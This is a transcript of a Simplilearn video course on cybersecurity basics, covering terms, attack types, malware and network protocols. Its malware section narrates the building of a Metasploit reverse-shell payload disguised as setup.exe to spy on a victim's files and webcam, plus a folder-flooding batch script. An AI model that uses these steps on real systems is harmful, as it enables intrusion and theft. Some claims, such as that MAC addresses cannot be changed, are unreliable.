Cybersecurity is one of the most in-demand fields today, with cyber threats becoming more complex every day. Whether you're looking to protect personal data or safeguard large organizations, the need for skilled professionals has never been greater. This complete cybersecurity full course is designed to give you the knowledge and tools you need to excel in this field. We will cover everything from understanding network protocols and IP address to diving deep into essential tools like Kali Linux, NMAP, and Wireshark. You'll also learn how to defend against top threats like SQL Injection, DDoS attack, and brute force methods. We'll also guide you through the fastest ways to jump into bug bounties and become a cybersecurity engineer. Plus, we will break down key concepts like IAM and Cissp security and risk management to give you a complete roadmap for your career in cybersecurity. And by the end of this course, you'll be equipped with the skills to tackle real-world security challenges and ace cybersecurity interviews with our top 50 questions and answers. So let's get started and pave your way to success in this exciting industry. Now, before we commence, if you're interested in building a successful career in cybersecurity, Simplilearn's professional certificate program in cybersecurity is the perfect choice for you. This is a 20-week program designed in collaboration with Purdue University Online and IBM, which offers over 100 hours of live expert-led classes and hands-on projects. You'll master essential skills like ethical hacking, penetration testing, and malware analysis while working on cutting-edge tools like Metasploit, Burp and NMAP. With advanced modules on genuine cybersecurity, you will stay ahead in this fast-evolving field. And upon completion, you'll earn prestigious certificates from Purdue and IBM, along with access to Purdue's Alumni Association. So what are you waiting for? Hurry up and enroll now, and you can find the link below.
Hello, my name is Saj Rai, and on behalf of Simplilearn, I'd like to welcome you to this tutorial on cybersecurity training. Let's first understand what is cybersecurity. Cybersecurity is the process of using best practices to protect systems, network, and programs from cyber attacks. A good place to start the discussion is by understanding the motives of the cyber criminals. Why do cyber criminals attack? In this example, this vault contains some valuable money. And the second vault also contains some money. Now let us secure the vault B with a lock. Now between these two vaults, which one do you think is the cyber criminal likely to attack? Well, most definitely vault A, which is unlocked. The cyber criminal would need to put in lesser effort to attack this unlocked vault. Let's look at another example. Now this time, Vault A is secured with a lock which will now take 5 minutes to unlock. And similarly, Vault B is also secured with a lock and this will take 15 minutes to unlock. Now again, between these two vaults, which one is the cyber criminal likely to attack? Well, most definitely Vault A again, as it will take less time to unlock this vault. In this third scenario, Vault A has $1 million and Vault B has $10 million. Now between these two vaults, which one is the cyber criminal most likely to attack? Well, this time the cyber criminal will definitely attack Vault B, which contains more money. Now that we've looked at some examples, let's take a look at what's in it for you in this tutorial. First, we'll understand the concept of cybersecurity. Next, we'll discuss the basic terminologies used in cybersecurity. We'll discuss how the internet works and the basic protocols used on the internet. Understanding common types of attacks is very important for you to be able to protect against them. And lastly, we'll discuss about malwares, its functions, and its sources. Well, I'm sure you're aware of the buzzword cybersecurity, but let's understand what cybersecurity means. Cybersecurity is the technology and process of using industry best practices to protect systems, network, and programs from cyber attacks. Cybersecurity attacks are usually aimed at accessing, changing, or destroying sensitive data, extorting money from users, or interrupting normal business processes. Everyone relies on critical infrastructure like power plants, hospitals, public transport system, and financial service companies. Securing these and other organizations is essential to keeping our society functioning. Some people tend to confuse cybersecurity with information security. They're actually different. Their capabilities are different. Information security is another way of saying data security. In other words, protecting the confidentiality, integrity, and availability of data. This involves the protection of information and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction. Information security deals with the protection of information even if it's stored in a file cabinet, while on the other hand, cybersecurity deals with protecting data and information from outside sources in cyberspace or the internet. So someone could likely be a cybersecurity expert without being an information security expert, or vice versa. Here are some of the basic terminologies that you need to be aware of in the world of cybersecurity. They are network, internet, internet protocols, IP address, MAC address, DNS, DHCP, router, malware, virus, worms, bots, and finally hash function and values. We will be discussing these points in detail in the upcoming topics. Let's start the discussion with understanding what a network is. A computer network is a group of two or more computers connected together so that they can communicate and share data with each other. For example, there are two computers exchanging data between them. And in this example, there are four computers connected to each other. These computers in the network could be sharing resources like a printer or a file server. A cybersecurity attack would most likely involve the use of this computer network. The most common resource shared today is connection to the internet. Now, the internet is a global system of interconnected computer networks that use the Internet Protocol Suite, which is the TCP/IP, to link devices worldwide via dedicated routers and servers. When two computers are connected over the internet, they can send and receive all kinds of vast range of information resources and services such as the World Wide Web, email, telephony, video, and file sharing. Cybersecurity primarily deals with attacks originating from the internet. When two computers are communicating with each other over the internet, they need to be able to understand each other and speak the same language. The data that is being transferred or received cannot just follow any path. To control the flow of data and connectivity, there are a set of rules which are used, which are known as Internet protocols. The protocol used on the internet is commonly known as TCP/IP because the foundational protocols in the suite are the Transmission Control Protocol, which is the TCP, and the Internet Protocol, which is the IP. Another important concept to understand is the IP address. An Internet Protocol address, or the IP address, is a unique logical address assigned to each device connected to a computer network that uses the Internet Protocol for communication. This unique address is designed to allow one connected computer to communicate with another device over the IP-based network like the Internet. Most IP address looks like this: 168.194.64.10. An IP address provides an identity to a network device on the internet, similar to a home or business address that supplies a specific physical location with an identifiable address. Devices in the network are differentiated from each other through these IP addresses. Similar to an IP address is the MAC address, which is a unique hardware identification number that is given to every device that connects on a network. The media access control, or the MAC addresses, are generally assigned by the vendor or the manufacturer of every network card, such as the Ethernet card or the Wi-Fi card. Unlike IP addresses, a MAC address is permanent and therefore cannot be changed. MAC address is generally 48 bits and written as 12-digit hexadecimal notation. Most MAC addresses look like this: D8, FC, 93, C5, A5, E0. This unique MAC address is used to identify the unique device so that data can be delivered to this particular device. The domain name system, or the DNS, can be considered as the phone book of the internet. We humans use domain names like google.com, which is easy to remember. However, the computers only understand an IP address and does not understand a domain name. This is where a DNS server is used to translate a domain name to its corresponding IP address. For example, if you want to browse google.com, type google.com in the browser URL. This request goes to a DNS server. The DNS server finds the IP address of google.com, The DNS server sends the IP address back to the computer, and the computer connects to google.com using the IP address. There are several attacks on the DNS system. A DNS poisoning attack is a type of cyber attack which involves spoofing DNS entries, which can result in a user being diverted from a legitimate server to a fraudulent one. Not many are aware of the DHCP protocol. The Dynamic Host Configuration Protocol, in short known as DHCP, it is a management protocol that is used to automatically assign an IP address to any device so that they can communicate using the Internet Protocol. DHCP automates and centrally manages these configurations rather than requiring network administrators to manually assign IP addresses to all network devices. Suppose there are these three computers that need IP addresses to communicate on the network. The DHCP communicates with these computers and automatically assigns them with an IP address along with other network details such as a subnet mask information, default gateway, and DNS address. The first system is assigned the IP address of 10.0.0.1, the second system is assigned 10.0.0.2, and the third system is assigned 10.0.0.3. You need to be aware that there are several DHCP related attacks which include DHCP spoofing and DHCP starvation, which can lead to availability issues. One of the most important devices that is used on the internet is the router. Well, this router is a networking device that transmits data packets between different networks using a routing protocol. A simple example of a router is the Wi-Fi router device that you probably use at home to connect to the internet. Your local devices can connect to the router, and the router can route the traffic onto the internet, making it possible for you to connect to the internet using your local systems. Router security is a top priority. A security hole in the network can expose you to attackers and your organization at risk. Most routers provide enough security tools to harden your network against possible cyber attacks, provided that you take the time to configure them to your advantage. Malware or malicious software is any program or file that is intentionally designed to disrupt or damage a computer system. Types of malware can include a wide range of concepts, including virus, ransomware, worms, trojans, rootkits, keyloggers, adware, spyware, bots, remote access trojan, logic bombs, and backdoors. We will discuss some of these malwares in the upcoming topics. A computer virus is a malware or a malicious program which is designed to spread from one system to another through self-replication and to perform any of the wide range of malicious activities. The malicious activities performed by a virus include data deletion, corruption, alteration, and exfiltration. An example of a virus is the Melissa virus, which was first detected in 1999. It is a macrovirus that was spread through email attachments. The best countermeasure against viruses is an antivirus or anti-malware scanner that is updated regularly. Another form of malware that is closely related to a virus is a worm. Worms are self-contained applications that don't require a host file or a hard drive to infect. Worms typically are focused on replication and distribution rather than on direct damage and destruction. An example is a w32.alcra.f, which is a worm that attempts to propagate through various P2P file sharing networks such as LimeWire. Worms are designed to exploit a specific vulnerability in a system, such as operating system, protocol, service, or application, and then use that flaw to spread themselves to other systems with the same flaw. They may be used to deposit viruses, logic bombs, ransomware, backdoors, or bots for botnets, or they may perform direct virus-like activities on their own. Countermeasures for worms are the same as for viruses, with the addition of keeping systems patched. The term bots or botnet is a shortened form of the phrase robot network. It is used to describe a malicious computer program that is used by a hacker to control your system remotely. A botnet is a culmination of traditional DOS attacks into a concept known as a distributed denial of service attack. A botnet can be used to perform any type of malicious activity, although they are most often used to perform distributed of denial flooding attacks. Botnets can be used to automatically send spam emails, or to retrieve web pages, or to change computer settings, or perform any other malicious activity. Botnets are possible because most computers around the world are accessible over the internet, and many of those computers have weak security. The best defense against a botnet is to keep your systems patched and hardened. Hashing is a one-way cryptographic function that takes in an input of any length and produces a fixed size unique output known as a hash value. A hash value serves as a unique code to detect when the original data source has been altered, since the altered file will produce a different hash value. Passwords should never be stored in plain text. We should use a hashing function to store passwords. Let's take an example to understand this. Instead of storing the password ABC at 123 as plain text, a salt value is appended to the plain text password and then the result is hashed. This is referred to as the hashed value. A salt is randomly generated, which is unique for each password. Both the salt value and the hashed value are stored together. In this section, we will discuss the common types of attacks, which consists of distributed denial of service, man-in-the-middle attack, email attacks, and password attacks. Distributed denial of service is a type of attack where multiple compromised systems, which are often infected with bots, are used to target a single system, causing a denial of service attack. In this example, the attacker prepares a botnet controller for the DDoS attack. The attacker uses this botnet controller to compromise the servers. The botnet controller installs a malicious piece of software called bots in the compromised server. These compromised servers can be referred to as zombie systems. The attacker then remote controls these servers to attack a victim server, in this example, Facebook.com. This DDoS attack is intended to temporarily or indefinitely disrupt the services of Facebook.com. Now, a legitimate user trying to access Facebook.com is unable to do so since all of Facebook's resources are used up in the DDoS attack. A man-in-the-middle attack is a communications eavesdropping attack. Attackers position themselves in the communication stream between a client and server or any two communicating entities. The client and server believe that they are communicating directly with each other. They may even have secured or encrypted communication links. However, the attacker can access and potentially modify the communications. One of the most common targets of man-in-the-middle attack is an online banking site. In this example, a bank customer is communicating with the bank. An attacker sits between the connection of two parties and observes the traffic. The hacker first creates a connection with the customer and then creates a connection with the bank. Notice how both the bank and customer assume that the system they are talking to is the legitimate system. The man in the middle appears to be the bank to the customer, and it appears to be the customer to the bank. In this banking scenario, the hacker could steal the card information or see that a user is making a transfer and change the destination account number or amount being sent. Countermeasures to man-in-the-middle attacks include strong encryption protocols and the use of strong authentication. The combination of username and password is the most common identification and authentication system. At the same time, they are the weakest form. Reliance solely on password isn't true security. The strength of a password is generally measured in the amount of time and effort involved in breaking the password through various forms of attacks. Password guessing attacks, because of an easy-to-guess password, is very common against websites and web servers. Some of the common types of password attacks are dictionary attack, brute force attack, keylogger, shoulder surfing, and rainbow table attack. Let's understand these attacks in the upcoming topics. A dictionary attack performs password guessing by using a pre-existing list of possible passwords. Password lists can include millions of possible passwords. Often, password lists or dictionaries are constructed around topics. Thus, if an attacker knows basic information about you as a person, they can attempt to exploit human nature's tendency to select passwords using words common or familiar to you. For example, if an attacker knows that you work in the automobile industry, you have dogs, and you enjoy traveling, they can select password dictionaries that include words, acronyms, and phrases common to those subjects. Dictionary attacks are relatively fast operations, but they have a low rate of success against targets with the knowledge of password security or whose systems enforce reasonable levels of password length and complexity. A brute force attack is designed to try every possible valid combinations of characters to construct possible passwords, starting with single characters and adding characters as it churns through the process in an attempt to discover a specific password used by the user account. Such attacks are always successful given enough time, whereas simple and short passwords can be discovered amazingly quickly with a brute force approach. Longer and complex passwords can take a long period of time, possibly into millions of years of computational time for complex passwords containing 16 or more characters. A keylogger is a form of malware that records the keystrokes typed into the system's keyboard. This is typically done covertly so that the person using the keyboard is unaware that their actions are being monitored. The captured keystrokes are then uploaded to the attacker for analysis and exploitation. Keyloggers are most often used for stealing passwords and other confidential information. Many anti-malware scanners include signatures for keyloggers to detect these type of abusive software. A keylogger infection might exhibit sluggish keyboard response, require typing keys twice to get them to be recognized by the system, and cause overall system performance degradation. Shoulder surfing occurs when someone is able to literally watch over a user's shoulder to view the keyboard or view their display. This could allow them to learn a password or see information that is confidential, private, or simply not for their eyes. This is especially effective in crowded places where a person uses a computer, smartphone, or ATM. Often, shoulder surfing is stopped by dividing worker groups by sensitivity levels using locked doors. And they should not work on sensitive data while in public space, such as coffee shop or on a plane. Privacy filter screen is also an effective solution to prevent shoulder surfing attack. Since the hashing algorithm is not reversible, you might think it is impossible to break a hash. However, there are methods to do so. Rainbow table attacks are a type of attack that attempts to discover the password from the hash. With a rainbow table, all of the following hashes are computed in advance. In other words, you create a series of tables, each has all the possible 2-letter, 3-letter, 4-letter, and so forth combinations and the hash of the combination using a known hashing algorithm like MD5, SHA-1, etc. Now, if you search a table for a given hash, the letter combination in the table that produced the hash must be the password that you are seeking. Social engineering is a form of attack that exploits human nature and human behavior. Social engineering attacks take two primary forms: convincing someone to perform an unauthorized operation or convincing someone to reveal confidential information. For example, the victim may be fooled into believing that a person on the phone is someone to be respected and trusted, such as a trusted IT professional. In just about every case, in social engineering, the attacker tries to convince the victim to perform some activity or reveal a piece of information that they shouldn't, such as their password. The result of a successful attack is information leakage or the attacker being granted logical or physical access to a secure environment. Email or electronic mail is the most common method of exchanging digital messages on the internet. The first email was sent in 1971 when a computer engineer used the @ symbol to designate the recipient of the email. At its core, an email is simply a text message from one user to another. Advancing technology has added extra features along the way, of course, like image and file attachments, links, and embedded maps. When you send and receive email, you use an email client which allows you to compose and read emails from other computer users. Your email client can be web-based, meaning you check it through a web browser. Examples include Gmail, Office 365, Zoho, or it can be an application on your computer like Outlook and Thunderbird. When John sends an email to Jack, it appears that the email is sent directly from John's system to Jack's system. However, that is not how email really works. It is much more complex than that. This is how an email really works. It involves several mail servers along with DNS servers. After John's SMTP client establishes a reliable communication channels to the SMTP server, the session is opened with a greeting by the server, usually containing its fully qualified domain name, in this case smtp.source.com. The mail server approaches the DNS server to resolve the MX record. The DNS server replies with the resolved IP address of the destination server. The source mail server is now able to establish a reliable communication with the destination SMTP mail server. And now Jack is able to receive the email in his email client using the POP3 or IMAP protocols. Let's understand the type of email attacks. Phishing is one of the most common attacks, and spoofing and email attachments. Let's understand these attacks in a little more detail. Phishing is a form of social engineering attack focused on stealing credentials or identity information from any potential target. It is based on the concept of phishing for information. Phishing attack is used to obtain sensitive information such as usernames, passwords, credit card details, or other personally identifiable information by masquerading as a trustworthy entity. For example, a bank, a service provider, or a merchant. Phishing attack generally involves an email to encourage people to share their details. In this example, Brian receives a fake email which mentions that his ABC bank account was going to expire today, creating a sense of urgency. How does Brian find out that it was a spam? Well, Brian does not have an ABC bank account. But what if someone actually had an account with ABC Bank? It is quite likely that the person would click on the given link and become victim to the phishing attack. Well, it is important to note that the banks do not send emails like this. You should choose to ignore this email or report the matter to your bank immediately. Email spoofing refers to an email with a forged sender address to make it look as if it came from some legitimate user. This is a common technique used by phishing attacks, spam, and malware to make their emails appear to be coming from legitimate sources such as governmental authorities, insurance companies, and banks. In this example, Bill receives a spoofed email from his manager asking him to share his password. Well, it is quite likely that Bill may share his password if he is unaware of the email being spoofed. As a good security practice, never share your password on email, or for that matter, never ever share your password with anyone. While email attachments are a convenient way to send files like images, documents, audios, or videos, it could be misused to share something which is malicious. Attackers might send you a spoofed email such as invoices encouraging you to download and open the file. Most malware email attachments include code or exploits to cause your computer to download more malware from the internet. These email attachments are often small, customized, and not widely spread, making them hard to detect by antivirus software. In recent years, email malware is often used to drop a ransomware which can delete or encrypt your files and backups, even if they are stored in the cloud or on a server. Malware or malicious code is any element of software that performs an unwanted function from the perspective of the legitimate user or owner of a computer system. Malware is big business. Not only are there hundreds of millions of malware families and variants in the world, and an unknown number of programmers developing the malware, there are also at least dozens of companies developing anti-malware solutions. The developers who are working on writing malware are getting paid to write the software, anticipating selling of this malware, or expect to make money from the malware operations. Going through the different types of malware, you will start to understand the complexity of the landscape today. This includes the functions of malware as well as the users. Malwares have been known to overwhelm system resources. A good example is that of a worm, which is a self-contained application that typically are focused on replication and distribution rather than on direct damage and destruction. It functions as a standalone piece of software in that it can spread without intervention by another program, and it focuses on spreading from an infected system to as many unaffected systems as possible. A worm infection may display symptoms that include a slow-to-respond system, applications that no longer will execute, a lack of free space on storage devices, CPU and memory utilization maxed out at 100%, system crashes, and abnormal network activity. This results in a denial of service attack. Some malware can create backdoors compromising the system's security. A backdoor is a malware which allows a hacker to remotely access your system. These small, maliciously purposed tools can easily be deposited on a computer through a Trojan horse, a virus, a worm, a website, mobile code download, or even as part of an intrusion activity. Once active on a system, the The tool opens access ports and waits for an inbound connection. Thus, a backdoor serves as an access portal for hackers so that they can bypass any security restrictions and gain access to a system. For example, Microsoft has a backdoor which is used to update the patches periodically. It is possible for an attacker to use this backdoor to attack the system remotely. Some malware such as retrovirus is known to disable security functions. Retroviruses are specifically targeted at antivirus systems to render them useless. You can consider a retrovirus to be an antivirus. Retroviruses can directly attack your antivirus software and potentially destroy your virus definition database file. Destroying this information without your knowledge would leave you with a false sense of security. The virus may also directly attack an antivirus program to create bypass for itself. As discussed earlier, malwares can be used to create botnets for a DDoS attack. Botnets are either directly or indirectly controlled by a hacker. A botnet can be used to perform any type of malicious activity, although they are most often used to perform denial-of-service flooding attacks. Botnets can send hundreds and millions of requests to a website, causing the website to crash and not available for legitimate users. The best defense against a botnet is to keep your systems patched and hardened and not to become the host of a botnet agent. Malwares are often copied from one location to another using various methods. Removable media such as USB pen drives are a major source of malware. It is generally a good practice to disable the use of such removable media to not only protect against malwares but also against theft of confidential data. Documents and executable files can be used to spread malware across systems. Generally, it's a good practice to not allow normal users the ability to install executable files in their system. Internet is the source of millions of malicious files that can be easily downloaded and can infect the systems. A firewall rule should be configured to prevent the download of such malicious files. Several malwares such as worm can easily spread across network connection. A system infected with worm must immediately be disconnected from the network to prevent it from infecting other systems in the network. As discussed earlier, email attachments could contain malicious links or files. Always be cautious of any attachments and scan them before downloading. If the primary purpose of the malware application is to deliver ads, then it is classified as adware. The primary purpose of adware is to display malicious ads and generate revenue for the creator. Some malwares are designed to display pop-up over legitimate content. These pop-ups could contain malicious links, and some of them could contain phishing content which are difficult to detect. As these new threats have developed, so too have some excellent programs for countering them. Keep your updates current because this is where most of the corrections for security problems are implemented. In this demo, you will learn how to create and deploy a virus using the Metasploit framework. We will use the msfvenom command available in Kali Linux to create a standalone binary that will create a reverse MetaPredator shell back to us. The -p option specifies the payload to use, which in this demo is the Windows MetaPredator. MetaPredator allows an attacker to control a victim's computer by running an invisible shell and establishing a communication channel back to the attacking machine. lhost option should be used to specify your IP address, which in this case is 192.168.41.129. lport option should be the port you wish to be connected back on, which in this case is 4444. -f specifies the output format, which in this case is exe. -a specifies the architecture to use. Save the file as setup.exe. Press enter. Give it a moment to generate the payload. Wonderful! The exe file with the payload is now generated. Now let's run the msfconsole command. This will start the Metasploit framework console. Use exploit multi-handler to handle the exploit. Set payload Windows MetaPredator reverse TCP to get the signal from host. Set lhost IP address. Here you set your own IP address. Set lport as 4444. Set any port that you want, not the standard port like HTTP uses port 80. Exploit and wait for the victim to click on the setup file. After this, copy the virus folder into the pen drive and paste it into the Windows. Then run the file on Windows system, and then you will see that the reverse TCP will get the details of the computer where the file was executed. Here are the commands. ls lists the files on victim system. pwd displays the current directory. sysinfo gets the system information. Help gets all the commands related to the present directory. Timestamp commands. Password database command #dump. Privilege element command get system. Here are the webcam commands to control your webcam. These are the various options available. Back in the Windows system, open up some files. This is bank credentials and your very sensitive passwords file. Back in your Kali Linux, type the screenshot command. And this will save the screenshot on your system. Let's open the file. And now you can see that the very sensitive file is now being displayed here in the screenshot. I hope you enjoyed the demo. This demo will show you to create unlimited new folder virus. Type this code on Notepad. This creates an infinite loop to create random folders and save it as .bat file. .bat file means that it will execute in command prompt. Create a folder called Documents and place the file .bat inside this folder. Now run the file where you want and it will start creating unlimited folders. You can press Shift-C to terminate this command. Type Y to terminate this batch job. You can see that there are thousands of folders that have been created. Click on this folder and you can see that these folders are all empty.
In this video, we are going to learn about the fundamental rules that allow devices to communicate seamlessly across a network. But instead of just listening to technical definition, we will also going to explain everything using a fun and relatable analogy. So guys, if you want to learn more about networking protocols, watch this video till the end. Now before we move on, just a quick info guys. Simplilearn has got Cybersecurity Experts Master Program. You can become Cybersecurity Expert with the Certified Ethical CompTIA Security Plus and Cissp exams. Here, in this course, you are going to be preparing for CEH, CompTIA and Cissp certifications with the latest curriculum. You are going to gain access to CEH V3 and integrated hands-on lab and certified ethical hacker exam vouchers. So guys, hurry up now and join the course. The course link is mentioned in the description box. Imagine a city so technologically advanced where every building, vehicle, devices communicate seamlessly through a vast interconnected network. And the backbone of that city is the network protocols, which are a set of predefined rules ensuring that all the devices, regardless of their make or operating system, can exchange data smoothly and securely. In this tutorial, we will explore the world of networking protocol, categorize them based on their functionality, and also dive deep into how they operate within the OSI model. So moving ahead, first, let us understand what is actually a protocol. So guys, protocol is a set of rules and standards that define how data is transmitted and received between devices in a network. It acts as a common language that enables computers, servers, and other devices to communicate effectively, regardless of their differences in hardware or software architecture. For example, let us say, imagine you are making a phone call, to a friend all over here, as you can see in this diagram. And you say hello to initiate the communication. Your friend responds by confirming that they can hear you. You speak in a language both of you can understand. You take turns in listening and speaking. When the conversation is over, you say goodbye and end the call. This is the structured way of communicating following a set of unwritten rules, a real-world example of a protocols. But if I talk about protocols in networking, they define how data is packaged, transmitted, received, and interpreted. They ensure that data is sent in a correct format, the receiving device understands and processes the data correctly, errors are detected and corrected if needed, security measures are in place to protect data from unauthorized access. Now, let us move ahead and understand about what are different types of networking protocols available. Now we are going to study about types of networking protocols. So network protocols can be broadly divided into three major categories. The first one is communication protocols. Here, these protocols ensure there is a seamless data exchange between devices. If I talk about security, then these protocols ensure that there is a secure communication against cyber threats. And finally, if I talk about management protocols, they monitor and optimize network performance. To understand these better, let us explore each one of them one by one. So if I talk about communication protocol, so this protocol governs data transmission and defines structure, format, and method for exchanging messages between devices. So we have this HTTP protocol or hypertext transfer protocol. So this is a backbone of the internet and it facilitates the web exchange between a server and a browser. So this is one kind of a protocol. Then you have a TCP protocol, which is a transmission control protocol. So it is a connection oriented protocol where protocol is ensured that the data packets are delivered accurately and they are in order. Then we have the internet protocol or IP protocol. These protocols addresses the system of internet, routes a packet across the given network. Then we have the UDP. So this is user datagram protocol. So it is a fast and connectionless protocol. And then you also have this file transfer protocol, which enables file sharing between servers using separate connections for controlling and data transfer. And finally, you could also see an ICMP, which is not mentioned in this diagram. So which is basically Internet Control Message Protocol. This protocol acts as a diagnostic tool, helping detect network errors and connectivity issues. So let us take an example and try to understand the communication protocol. Now imagine you are sending a parcel from one city to the another, or you can also consider sending from one country to the another. Now let us understand how these protocols are going to work. So if I talk about TCP IP that we have discussed earlier, you can consider it as a courier service. You choose a reliable courier company that ensures your package is delivered intact and it is in order. So the courier service which is reliable, that is TCP IP protocol working all over here in this scenario. Now if I talk about UDP or user datagram protocol, you can consider this as a public announcer. So instead of a courier, you broadcast a message over the city's public announcement system that everyone hears it. But there's no guarantee also that anyone will respond. Then you could understand FTP protocol as a parcel delivery system. So you use a secure delivery truck to send bulk packages from one place to the another. And if I talk about ICMP, so this is kind of a traffic reporter. This protocol is working like that. So this protocol service monitors traffic and alerts courier if certain routes are blocked. So in this way, these communication protocols are working. These communication protocols also ensure that fast, structured, and reliable delivery of data is happening in the digital network, just like cities' postal and transport system. Now let us move ahead and discuss about the security protocols. So if I talk about the network security protocols, so these security protocols protect sensitive data from unauthorized access, cyber attacks, and data breaches. Now, if I talk about SFTP, which is not mentioned here, so you can consider it as a secure version of FTP, so which basically ensures the secure file transfer. So here it encrypts a file transfer using the public key encryption for authentication. Then you have the HTTPS, which is Hypertext Transfer Protocol. This is a secure version of HTTP which encrypts data between browsers and the servers. Then you have the SSL also, which is a secure socket layer. and it ensures that all the encrypted communication is happening over the internet, preventing any eavesdropping or any data theft. Now, as you can see also here, we have the SMTP protocol, which is Simple Mail Transfer Protocol. It's also a communication protocol. So it is ensuring that it sends email over the internet, and also it ensures that emails are properly formatted, routed, and delivered to the recipient's email server. This protocol works in very simple steps. Like first of all, when you send an email, SMTP performs these steps. First is compose the email. Okay, so you type email in your email client like Gmail or Outlook. Then it connects to a SMTP server when you hit send. So your email client communicates with an SMTP server. Then the routing happens in the email, where SMTP server checks the recipient's domain name and contacts their email server. And then the email is being delivered. So the recipient's email server receives a message and stores it for retrieval. So these were one of the scenario. And you could consider the same analogy for SMTP as a postal system also. Now, suppose you write a letter all over here, and you put it up in envelope. Okay, you drop it up at the post office, which is basically the SMTP server, where it's checked and it is sorted, and the postal system finds the recipient's address, mail server, and also the recipient can pick up and read the letter. Okay, so there are protocols like IMAP which are used to retrieve the emails. So SMTP only sends emails, not retrieves them. Okay, retrieval is done by IMAP protocol or POP3. So this was one of the example. Now let us discuss about SSH protocol. So SSH means it is a secure shell network protocol, which is basically used to securely access and control remote computers over an encrypted connection. It is widely used for securing remote logging and file transfers. Now, how does SSH works? So it initiates the connection. A user enters a command in the terminal, such as you can say SSH user remote server. Then the authentication happens, where the user provides a password or uses an SSH key for authentication. Once it is authenticated, the user gains secure access to the remote server, and then the commands starts executing. The user can run commands, transfer files, or manage the system remotely. Imagine like a bank vault. Okay, so you can think SSH of a secure key card entry system for a high security vault. Okay, or in the banking, in the banks basically, where you will be needing credentials, password, or key card. Once inside, all the communications are private and encrypted. Okay, you can check records, retrieve documents, or make updates very much securely. And when done, you can log out and exit the vault safely. So you can think of SSH providing a secure way to access and manage remote computers, just like a bank vault system, which prevents the unauthorized entry. Now let us move ahead and discuss about our third and final protocol, which is basically the network management protocols. Network management refers to the process of monitoring, configuring, and maintaining the network devices to ensure a seamless communication is happening and preventing failures. It involves fault detection, performance optimization, and security enforcement. Now, the key network management protocols include like SNAP, which is Simple Network Management Protocol. So this protocol, as you can see all over here, this is basically used to monitor and manage network devices such as routers, switches, or servers. How this protocol works, guys? So, for example, devices have an SNMP agent that collects data, for example, the CPU usage or bandwidth. And the SNMP manager queries the agent to monitor network's health. If an issue occurs, then SNMP sends alerts called traps. So this is how it works. So for example, you can consider in a large office, SNMP alerts IT admins if a router is overloaded, something like this. Then we have the DHCP protocol, very famous protocol. So it stands for Dynamic Host Configuration Protocol. It automatically assigns IP addresses to devices in a network. So suppose when a new device connects, so it requests an IP address from the DHCP server, and the DHCP server assigns the available IP, preventing conflicts. This could be example in a Wi-Fi enabled office. Okay, so employee don't need to manually configure IPs. Here DHCP assigns them dynamically. Then we have the ICMP protocol, which is Internet Control Message Protocol. This protocol is basically used for error reporting and network diagnostics. Here, ICMP actually sends a control messages like ping requests to test the connectivity. So if a network path is down, then ICMP informs the sender. For example, if a website isn't loading, then a technician runs ping www.com or any given domain to check if the server is reachable or not. Then we have the border gateway protocol. So this is kind of a routing protocol which determines the best path for internet traffic. Internet routers use BGP to exchange routing information mostly, and it finds most efficient route to send the data packets. For example, like in a fiber optic cable under the ocean, if it fails, then BGP reroutes the traffic via another path. Okay, so you can consider this example as how it is being used. Now we'll have a look on POP3. So POP3 means Post Office Protocol version 3. Basically, this protocol is one of the protocol that we have discussed earlier, that it retrieves email from the remote server. So when the user opens their email, clients, POP3 downloads the messages to their devices. Emails are deleted from the server after retrieval. So for example, you can consider using an Outlook to download emails from Gmail server. Okay, so there it is used. Now, these protocols are very much important because they ensure network reliability by identifying issues before they cause any failure, optimize the performance by managing the bandwidth and traffic, and automate an IP allocation. And also, it ensures the security. So you could see this is as an example of a network security protocol, how it's working. So suppose this is our office. Now the data packets are being sent. So here you have the IP header, then IP payload. So IPsec is a security protocol. So here the IPsec header is added and a secure payload is added. And the same is, data is being transferred. This packet is to the laptop and it is routed via router IPsec, okay, with IPsec protocol all over here to the branch office. So this is how, you can consider architecture where, the network security communication is happening. Now, this is an example of a network monitoring protocol where there are endpoints, okay, and these you could see you are sending the data about health and performance, and it aggregates data from multiple endpoints. The network monitoring tools are present which converts raw data into usable metrics, and then the following data is given to the network administrators. Also, it generates alerts and reports. So this is how the network monitoring protocols are working in this alignment. So we've discussed about these protocols, and this was a certain diagrammatic explanation. So I hope so you would have got a brief idea regarding these protocols. Okay. So now let us briefly understand the 7 layers of the OSI model. Okay. Now this is OSI stands for Open System Interconnection Model. So there are 7 layers in this model, okay, and along with there are protocols also mentioned and the components associated with each layer. So let us break down these layers. So first of all, we have the physical layer, okay. The purpose of this layer is to define the physical structure of the network, such as cables, switches, and wireless transmission. Here, the function is that of this layer is that it converts data into electrical signals like radio or optic signals for transformation. It also manages bit rate control and transmission media. Now, this is all about the physical layer. Then you have the data link layer, or you could say the error detection layer. This layer basically manages the direct node-to-node data transfer and error detection. The function of this layer is that it ensures that the data is correctly framed before transmission. It detects and corrects errors in transmission, and it basically uses MAC address for device identification. Examples of this layer could be considered as Ethernet or PPP, point-to-point protocol, switches, bridges. All these come into this layer. The third one, we have the network protocol or the routing layer. So this layer determines the best path for data to travel between different networks. It assigns logical IP addresses, routes data using protocols. It manages network congestion and fragmentation. The examples of this protocol could be IP protocol, ICMP, IPsec, IGMP, okay, Internet Group Management Protocols. Just like navigation systems, that determine the best route for a vehicles to reach destination, similarly, this layer is working like that. Then we have the transport layer, which basically is like the delivery layer. It ensures complete and reliable data transmission. This layer divides data into smaller segments and ensures proper reassembly. It provides error detection and correction. It uses TCP for reliable transmission and UDP for faster connectionless communications. Examples could be, the TCP protocol or UDP protocol. So you can consider it like a couriers, that ensure that packages are delivered safely and in the correct order. So after this, the data is moved to the session layer, which is like the connection layer. It establishes, maintains, and terminates the communication sessions. It helps in managing sessions between applications. It handles authentication and any reconnections if needed. So for example, we have the API sockets all over here in this layer. So just like customer service representatives who handle call and ensure smooth communication between businesses, this layer is working like that. Then we have the presentation layer, which ensures that data is formatted properly for the application layer. It translates data formats like converts images, compresses file, encrypts and decrypts data for security. Then we have example of presentation layer like SSL, Secure Socket Layer, SSH, IMAP protocol, FTP. So you can consider these as a language translators who convert a message into a format that the recipient can understand. And finally, we have the application layer, which has a purpose of providing network services directly to the users. It manages data exchange between applications and the network. It enables browsing, email, and file transfer. So example of this layer include HTTP protocol, FTP, IRC, SSH, DNS. Okay, so you can consider something like this as these are the customer-facing employee in a company who directly interact with the users.
